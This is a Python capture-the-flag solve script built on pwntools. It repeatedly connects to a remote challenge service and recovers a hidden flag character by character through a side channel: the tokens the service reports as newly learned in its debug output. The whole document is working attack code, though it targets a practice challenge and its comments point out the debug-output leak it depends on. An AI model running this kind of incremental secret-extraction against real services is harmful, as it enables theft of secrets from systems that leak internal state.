
exploit.py

import string
import json
from pwn import *
from ast import literal_eval

# Known leading part of the flag; the search loop further down extends it
# piece by piece until a closing brace appears.
prefix = "ictf{"

# Against localhost: bruteforce takes ~8mins
# Against remote: bruteforce takes ~10mins with the shorter dictionary

def _strip_word_end(raw_tokens):
    """Return the tokens of *raw_tokens* with every '</w>' marker removed."""
    cleaned = []
    for piece in raw_tokens:
        # Loop until stable: deleting one marker can splice the surrounding
        # characters into another '</w>'.
        while '</w>' in piece:
            piece = piece.replace('</w>', '')
        cleaned.append(piece)
    return cleaned


def try_flag(flag):
    """Submit *flag* as one statement and return the token lists the service prints.

    Opens a fresh connection, sends *flag* at the statement prompt, parses the
    two ``[DEBUG]`` lines, answers the classification prompt with ``human``,
    and closes the connection.

    Returns:
        A ``(tokens, new_tokens)`` pair: the tokenization reported for the
        statement and the tokens reported as newly learned, both with the
        '</w>' marker stripped.

    NOTE(review): everything this function learns comes from the service's
    ``[DEBUG]`` lines. A deployment that does not echo tokenizer internals to
    clients leaves it nothing to parse.
    """
    # Silence pwntools' connection banner only; the exchange itself runs at
    # the ambient log level.
    with context.local(log_level='error'):
        # r = process(['python3', 'chall.py'])
        conn = remote('0.cloud.chals.io', 21308)
    try:
        conn.sendlineafter('Please submit the statement to be classified:\n', flag)

        conn.recvuntil("[DEBUG] Resulting tokenization: new_tokens=")
        # literal_eval accepts Python literals only, so the peer's output is
        # parsed as data and never executed locally.
        filtered_tokens = _strip_word_end(literal_eval(conn.recvline().decode()))

        conn.recvuntil("[DEBUG] Newly learned tokens: ")
        filtered_new_tokens = _strip_word_end(literal_eval(conn.recvline().decode()))

        conn.recvuntil("Please classify the above statement as \"human\" or \"robot\":\n")
        conn.sendline('human')
        return filtered_tokens, filtered_new_tokens
    finally:
        # Always release the socket, even when a prompt never arrives or a
        # debug line fails to parse.
        with context.local(log_level='error'):
            conn.close()


# import ipdb; ipdb.set_trace()
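while True:
    # Candidate continuations: the flag alphabet plus the tokens the service
    # currently reports for the known prefix.
    # The braces are written plainly: the previous '\{' and '\}' were invalid
    # escape sequences, which raise a SyntaxWarning on current Python and
    # silently added two backslash candidates to the list.
    all_options = list(string.ascii_lowercase + string.digits + '_{}')
    tokens, baseline_new_tokens = try_flag(prefix + "{{{{{{{")

    all_options = sorted(list(tokens) + all_options)
    # all_options = list(sorted(all_options))
    new_tokens_results = {}
    for option in all_options:
        flag = prefix + option
        tokens, new_tokens = try_flag(flag + "{{{{{{{")
        # Only newly learned tokens that start with the known prefix count.
        new_flag_tokens = [token for token in new_tokens if token.startswith(prefix)]
        if not new_flag_tokens:
            continue
        longest_flag_token = max(new_flag_tokens, key=len)
        new_tokens_results[option] = longest_flag_token
        print(f"{flag=} {len(new_flag_tokens)=} {new_flag_tokens=}")

    # max() on an empty mapping raises a bare ValueError; fail with a message
    # that says which prefix the round got stuck on instead.
    if not new_tokens_results:
        raise RuntimeError(
            f"no candidate produced a new token starting with {prefix!r}"
        )

    # pick the one that has the longest new token
    max_option = max(new_tokens_results, key=lambda k: len(new_tokens_results[k]))
    print(f"max_option: {max_option=} {len(new_tokens_results[max_option])=}")
    prefix += max_option
    if '}' in prefix:
        break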